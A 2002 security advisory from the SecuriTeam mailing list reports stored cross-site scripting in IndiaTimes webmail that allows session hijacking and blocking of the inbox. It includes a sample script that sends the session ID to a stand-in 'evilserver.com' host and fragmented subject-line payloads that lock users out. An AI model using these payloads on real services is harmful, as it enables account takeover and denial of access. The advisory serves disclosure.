[NEWS] IndiaTimes.com - Email - Session hijacking and Inbox Blocking

From: support@securiteam.com
Date: 04/29/02 

From: support@securiteam.com
To: list@securiteam.com
Date: Mon, 29 Apr 2002 09:07:39 +0200 (CEST)

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

When was the last time you checked your server's security?
How about a monthly report?
http://www.AutomatedScanning.com - Know that you're safe.
- - - - - - - - -

  IndiaTimes.com - Email - Session hijacking and Inbox Blocking
------------------------------------------------------------------------

SUMMARY

Email.indiatimes.com is a very popular Web-Email facility provided by
<http://www.indiatimes.com> http://www.indiatimes.com, online version of
newspaper 'The Times of India'. The script used by the web site allows
user to embed HTML and JavaScript into emails. Making it is possible to
insert evil code in the mail. Although the script does not use cookies, it
is still possible to hijack a user's session by sending him an email (even
if the he does not read the email).

DETAILS

Lets convert the whole Discussion in Dialog Form:

Q: How are sessions hijacked? The site does not use cookies.
A: Well, The site does not use cookies but the session ID/Key is contained
in:
<Form name=Rform ...>
 <input type=hidden name=SID value="some_random_number:>
</form>.
This SID is the only token required to authenticate user. Therefore, evil
may pass this to a script installed at some server, from where he can
misuse it.

Example:
<script>
self.location.href="http://evilserver.com/evil.cgi?SID="+Rform.SID.value
</script>

Q: The user may choose not to read the evil's mail. What can we do now?
A: After clicking 'inbox' whole list of mails appears showing the subject
and sender's address of each mail. The <SCRIPT> embedded by the sender in
the 'Subject' is executed as soon as user tries to open the inbox. This
makes the user even more vulnerable to attack.

Q: Only 30 characters of a 'Subject' are displayed. So, if one tries to
insert script in the 'Subject' he can only write a code of 13 characters
(30-strlen('<SCRIPT></SCRIPT>'). Is it impossible to write a code of 13
characters to exploit the above vulnerability?

A: It is possible. Let us show you.
One may fragment the code into smaller parts and send the fragments in
subjects of separate mails, continuously in the following way:

*/</script>
*/history.go(-1)/*
<script>*/

This will not allow the user to open his inbox. Now, see the beauty of
comments and the reverse order or lines. The comment will help joining of
the code and since the most recent message is on the top, the order
reverses.

Q: The user may disable JavaScript in the browser's setting.
A: The site requires JavaScript for its functionality, therefore you
cannot disable JavaScript and continue using it.

Impact:
Because of high number of users of Email.indiatimes.com, this
vulnerability poses a great risk.

Vendor status:
The vendor was notified but there was no response so far.

ADDITIONAL INFORMATION

The information has been provided by <mailto:sggosuch@isc.iitr.ernet.in>
Giri Sandeep.

========================================

This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

====================
====================

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

Relevant Pages

  • [NT] VBScript Handling in IE can Allow Web Pages to Read Local Files
    ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... Frames are used in Internet Explorer to provide for a fuller browsing ... The vulnerability could only be used to view files. ... The flaw allows script to violate IE's ...
    (Securiteam)
  • Re: FWIW: ST Enterprise Cancelled
    ... > through the Guardian while they were playing with it. ... Where in any version of Ellison's script is this? ... LeBeque tells Beckwith that hes not going to keep doing ... >>will not do with their continuing characters and overall storyline, ...
    (sci.space.history)
  • Re: Problems with PrintReady javascript and published Frontpage 2003 web site
    ... 2003 web site ... > In your script delete the 5 lines you have added between ... > Then Test in Browser before you publsih ... > | link it opens a new windows and my browser freezes. ...
    (microsoft.public.frontpage.client)
  • Re: FWIW: ST Enterprise Cancelled
    ... >>charecter...why didn't they just film it the way Harlan wanted them to? ... >>will not do with their continuing characters and overall storyline, ... >so Gerrold had a script, ... It worked for that one episode, ...
    (sci.space.history)
  • ATTN JMS: B5 (and general) script questions
    ... in reading the _B5_ script books that sometimes you just ... _what_ the characters are doing. ... Yet, in the aired episode, the scene ... give specific stage directions. ...
    (rec.arts.sf.tv.babylon5.moderated)